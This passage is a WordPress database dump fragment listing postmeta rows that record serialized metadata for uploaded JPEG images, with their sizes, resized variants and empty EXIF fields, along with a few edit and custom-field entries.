(1983,619,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1000;s:4:\"file\";s:62:\"2025/07/518152399_122237171924202781_7608270207764390845_n.jpg\";s:8:\"filesize\";i:240490;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518152399_122237171924202781_7608270207764390845_n-300x203.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:203;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18800;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518152399_122237171924202781_7608270207764390845_n-1024x693.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:693;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136200;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518152399_122237171924202781_7608270207764390845_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8009;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518152399_122237171924202781_7608270207764390845_n-768x520.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:520;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:86397;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518152399_122237171924202781_7608270207764390845_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20373;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1984,620,'_wp_attached_file','2025/07/518193992_122237172416202781_7527918056717933023_n.jpg'),
(1985,620,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:979;s:4:\"file\";s:62:\"2025/07/518193992_122237172416202781_7527918056717933023_n.jpg\";s:8:\"filesize\";i:237522;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518193992_122237172416202781_7527918056717933023_n-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18902;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518193992_122237172416202781_7527918056717933023_n-1024x679.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:679;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:136993;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518193992_122237172416202781_7527918056717933023_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7945;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518193992_122237172416202781_7527918056717933023_n-768x509.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:509;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87547;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518193992_122237172416202781_7527918056717933023_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21005;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1986,621,'_wp_attached_file','2025/07/518239002_122237172374202781_9182856373998635626_n.jpg'),
(1987,621,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:1042;s:4:\"file\";s:62:\"2025/07/518239002_122237172374202781_9182856373998635626_n.jpg\";s:8:\"filesize\";i:241631;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518239002_122237172374202781_9182856373998635626_n-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17905;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518239002_122237172374202781_9182856373998635626_n-1024x723.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:723;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135887;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518239002_122237172374202781_9182856373998635626_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7454;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518239002_122237172374202781_9182856373998635626_n-768x542.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:542;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85351;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518239002_122237172374202781_9182856373998635626_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19213;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1988,622,'_wp_attached_file','2025/07/518367310_122237172242202781_6649386908031280053_n.jpg'),
(1989,622,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1214;s:6:\"height\";i:1069;s:4:\"file\";s:62:\"2025/07/518367310_122237172242202781_6649386908031280053_n.jpg\";s:8:\"filesize\";i:316771;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518367310_122237172242202781_6649386908031280053_n-300x264.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:264;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30434;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518367310_122237172242202781_6649386908031280053_n-1024x902.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:902;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:242397;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518367310_122237172242202781_6649386908031280053_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9883;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518367310_122237172242202781_6649386908031280053_n-768x676.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:676;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:154839;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518367310_122237172242202781_6649386908031280053_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24701;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1990,623,'_wp_attached_file','2025/07/518370205_122237172230202781_2297823551756806775_n.jpg'),
(1991,623,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:1020;s:4:\"file\";s:62:\"2025/07/518370205_122237172230202781_2297823551756806775_n.jpg\";s:8:\"filesize\";i:355295;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:62:\"518370205_122237172230202781_2297823551756806775_n-300x207.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:207;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23588;}s:5:\"large\";a:5:{s:4:\"file\";s:63:\"518370205_122237172230202781_2297823551756806775_n-1024x708.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:708;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198806;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:62:\"518370205_122237172230202781_2297823551756806775_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10186;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:62:\"518370205_122237172230202781_2297823551756806775_n-768x531.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:531;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124580;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:62:\"518370205_122237172230202781_2297823551756806775_n-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24562;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(1994,608,'_thumbnail_id','616'),
(1995,608,'_edit_last','1'),
(1996,608,'title_style','default'),
(1997,608,'_title_style','field_5d1a0217cf408'),
(1998,608,'related',''),
(1999,608,'_related','field_603b51c3e183e'),
(2000,624,'title_style','default'),
(2001,624,'_title_style','field_5d1a0217cf408'),
(2002,624,'related',''),
(2003,624,'_related','field_603b51c3e183e'),
(2008,625,'_edit_lock','1752463629:1'),
(2009,626,'_wp_attached_file','2025/07/S__28565515.jpg'),
(2010,626,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1170;s:6:\"height\";i:735;s:4:\"file\";s:23:\"2025/07/S__28565515.jpg\";s:8:\"filesize\";i:257561;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565515-300x188.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:188;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20117;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565515-1024x643.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:643;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135853;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565515-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9367;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565515-768x482.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:482;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88506;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565515-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23032;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2011,627,'_wp_attached_file','2025/07/S__28565516.jpg'),
(2012,627,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1311;s:6:\"height\";i:1019;s:4:\"file\";s:23:\"2025/07/S__28565516.jpg\";s:8:\"filesize\";i:426680;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565516-300x233.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24254;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565516-1024x796.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:796;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:186183;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565516-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8989;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565516-768x597.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:597;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:117879;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565516-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21145;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2013,628,'_wp_attached_file','2025/07/S__28565521_0.jpg'),
(2014,628,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:1029;s:4:\"file\";s:25:\"2025/07/S__28565521_0.jpg\";s:8:\"filesize\";i:329121;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__28565521_0-300x209.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:209;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20283;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__28565521_0-1024x714.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:714;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130698;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565521_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8653;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__28565521_0-768x535.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:535;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:85488;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565521_0-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19722;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2015,629,'_wp_attached_file','2025/07/S__28565519_0.jpg'),
(2016,629,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1741;s:6:\"height\";i:940;s:4:\"file\";s:25:\"2025/07/S__28565519_0.jpg\";s:8:\"filesize\";i:471401;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__28565519_0-300x162.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:162;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16973;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__28565519_0-1024x553.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:130061;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565519_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8778;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__28565519_0-768x415.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:415;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80521;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:26:\"S__28565519_0-1536x829.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:829;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:243045;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565519_0-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21279;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2017,630,'_wp_attached_file','2025/07/S__28565520_0.jpg'),
(2018,630,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:25:\"2025/07/S__28565520_0.jpg\";s:8:\"filesize\";i:413238;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__28565520_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22498;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__28565520_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:151115;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565520_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9369;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__28565520_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97527;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565520_0-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20889;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2019,631,'_wp_attached_file','2025/07/S__28565517_0.jpg'),
(2020,631,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:25:\"2025/07/S__28565517_0.jpg\";s:8:\"filesize\";i:469042;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"S__28565517_0-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22079;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"S__28565517_0-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:163984;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565517_0-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9044;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"S__28565517_0-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:103732;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"S__28565517_0-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20701;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2021,632,'_wp_attached_file','2025/07/S__28565522.jpg'),
(2022,632,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565522.jpg\";s:8:\"filesize\";i:396740;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565522-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21476;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565522-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144371;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565522-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8634;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565522-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:93184;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565522-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18828;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2023,633,'_wp_attached_file','2025/07/S__28565523.jpg'),
(2024,633,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:23:\"2025/07/S__28565523.jpg\";s:8:\"filesize\";i:310914;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565523-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18978;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565523-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:115332;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565523-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7975;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565523-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:75405;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565523-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17746;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2025,634,'_wp_attached_file','2025/07/S__28565526.jpg'),
(2026,634,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1476;s:6:\"height\";i:970;s:4:\"file\";s:23:\"2025/07/S__28565526.jpg\";s:8:\"filesize\";i:389355;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"S__28565526-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19809;}s:5:\"large\";a:5:{s:4:\"file\";s:24:\"S__28565526-1024x673.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:673;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144768;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565526-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8785;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"S__28565526-768x505.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:505;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:92053;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:23:\"S__28565526-350x184.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:184;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22018;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(2027,635,'_wp_attached_file','2025/07/S__28565533.jpg'),
